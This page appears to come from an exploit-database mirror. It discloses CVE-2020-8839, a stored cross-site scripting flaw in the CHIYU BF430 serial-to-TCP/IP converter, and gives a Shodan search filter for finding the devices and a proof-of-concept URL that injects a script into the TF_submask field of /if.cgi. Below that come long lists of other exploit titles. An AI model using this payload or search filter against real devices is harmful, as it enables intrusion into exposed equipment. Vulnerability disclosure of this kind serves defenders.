Menu

Search for hundreds of thousands of exploits

"CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting"

Author

Exploit author

Luca.Chiou

Platform

Exploit platform

cgi

Release date

Exploit published date

2020-02-11

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# Exploit Title: CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting
# Google Dork: In Shodan search engine, the filter is "CHIYU"
# Date: 2020-02-11
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.chiyu-t.com.tw/en/
# Version: BF430 232/485 TCP/IP Converter all versions prior to 1.16.00
# Tested on: It is a proprietary devices: https://www.chiyu-t.com.tw/en/product/rs485-to-tcp_ip-converter_BF-430.html
# CVE: CVE-2020-8839

# 1. Description:
# In CHIYU BF430 web page,
# user can modify the system configuration by access the /if.cgi.
# Attackers can inject malicious XSS code in "TF_submask" field.
# The XSS code will be stored in the database, so that causes a stored XSS vulnerability.

# 2. Proof of Concept:
# Access the /if.cgi of CHIYU BF430 232/485 TCP/IP Converter.
# Injecting the XSS code in parameter “TF_submask”:
# http://<Your Modem IP>/if.cgi?TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E

==---------------------------------------------------------------
This email contains information that is for the sole use of the intended recipient and may be confidential or privileged. If you are not the intended recipient, note that any disclosure, copying, distribution, or use of this email, or the contents of this email is prohibited. If you have received this email in error, please notify the sender of the error and delete the message. Thank you.
---------------------------------------------------------------==!!
Release DateTitleTypePlatformAuthor
2020-02-14"EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path"localwindows"Roberto Piña"
2020-02-14"HomeGuard Pro 9.3.1 - Insecure Folder Permissions"localwindowsboku
2020-02-14"SprintWork 2.3.1 - Local Privilege Escalation"localwindowsboku
2020-02-14"phpMyChat Plus 1.98 - 'pmc_username' SQL Injection"webappsphpJ3rryBl4nks
2020-02-13"Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting"webappsphp"Mehran Feizi"
2020-02-13"Wordpress Plugin tutor.1.5.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-13"Wordpress Plugin wordfence.7.4.5 - Local File Disclosure"webappsphp"Mehran Feizi"
2020-02-13"Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload"webappsphp"Mehran Feizi"
2020-02-13"WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-13"OpenTFTP 1.66 - Local Privilege Escalation"localwindowsboku
2020-02-13"PANDORAFMS 7.0 - Authenticated Remote Code Execution"webappsphp"Engin Demirbilek"
2020-02-12"HP System Event Utility - Local Privilege Escalation"localwindowshyp3rlinx
2020-02-12"MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow"localwindowsZwX
2020-02-12"MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow"localwindowsZwX
2020-02-12"MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow"localwindowsZwX
2020-02-11"CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting"webappscgiLuca.Chiou
2020-02-11"Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting"webappsphp"Sayak Naskar"
2020-02-11"WordPress InfiniteWP - Client Authentication Bypass (Metasploit)"webappsphpMetasploit
2020-02-11"freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path"localwindowsboku
2020-02-11"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution"remotefreebsd"Marco Ivaldi"
2020-02-11"Disk Savvy Enterprise 12.3.18 - Unquoted Service Path"localwindowsboku
2020-02-11"Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path"localwindowsboku
2020-02-11"Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow"localwindowsZwX
2020-02-11"Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path"localwindowsboku
2020-02-11"DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow"localwindowsZwX
2020-02-11"DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow"localwindowsZwX
2020-02-11"FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path"localwindowsboku
2020-02-11"Torrent iPod Video Converter 1.51 - Stack Overflow"localwindowsboku
2020-02-10"LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting"webappsphp"Jinson Varghese Behanan"
2020-02-10"Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow"localwindowsZwX
Release DateTitleTypePlatformAuthor
2020-02-11"CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting"webappscgiLuca.Chiou
2019-09-09"Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure"webappscgiLiquidWorm
2019-07-12"Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution"webappscgi"Chris Lyne"
2019-02-18"Master IP CAM 01 3.3.4.2103 - Remote Command Execution"webappscgi"Raffaele Sabato"
2019-02-11"Smoothwall Express 3.1-SP4 - Cross-Site Scripting"webappscgi"Ozer Goker"
2019-02-11"IPFire 2.21 - Cross-Site Scripting"webappscgi"Ozer Goker"
2019-01-24"SirsiDynix e-Library 3.5.x - Cross-Site Scripting"webappscgiAkkuS
2019-01-18"Webmin 1.900 - Remote Command Execution (Metasploit)"remotecgiAkkuS
2019-01-14"AudioCode 400HD - Command Injection"webappscgiSysdream
2019-01-07"PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting"webappscgi"Kumar Saurav"
2018-11-30"Synaccess netBooter NP-02x/NP-08x 6.8 - Authentication Bypass"webappscgiLiquidWorm
2018-08-15"ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection"webappscgi"Kyle Lovett"
2018-08-03"cgit < 1.2.1 - 'cgit_clone_objects()' Directory Traversal"webappscgi"Google Security Research"
2018-03-30"Homematic CCU2 2.29.23 - Arbitrary File Write"webappscgi"Patrick Muench and Gregor Kopf"
2018-03-30"Homematic CCU2 2.29.23 - Remote Command Execution"webappscgi"Patrick Muench and Gregor Kopf"
2018-01-08"Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration"webappscgi"Steve Kaun"
2018-01-01"Cambium ePMP1000 - 'get_chart' Shell via Command Injection (Metasploit)"remotecgiMetasploit
2017-12-15"ITGuard-Manager 0.0.0.1 - Remote Code Execution"webappscgi"Nassim Asrir"
2017-12-13"Meinberg LANTIME Web Configuration Utility 6.16.008 - Arbitrary File Read"webappscgi"Jakub Palaczynski"
2017-12-07"LaCie 5big Network 2.2.8 - Command Injection"remotecgi"Timo Sablowski"
2017-11-28"Synology StorageManager 5.2 - Root Remote Command Execution"webappscgiSecuriTeam
2017-10-18"Linksys E Series - Multiple Vulnerabilities"webappscgi"SEC Consult"
2017-10-15"Webmin 1.850 - Multiple Vulnerabilities"webappscgihyp3rlinx
2017-07-24"IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)"remotecgiMetasploit
2017-07-19"Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection"webappscgixort
2017-07-19"Sonicwall < 8.1.0.6-21sv - 'gencsr.cgi' Command Injection (Metasploit)"webappscgixort
2017-07-19"Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)"webappscgixort
2017-07-19"Sonicwall < 8.1.0.2-14sv - 'sitecustomization.cgi' Command Injection (Metasploit)"webappscgixort
2017-07-19"Sonicwall Secure Remote Access 8.1.0.2-14sv - Command Injection"webappscgixort
2017-06-26"NETGEAR DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit)"remotecgiMetasploit
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48040/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse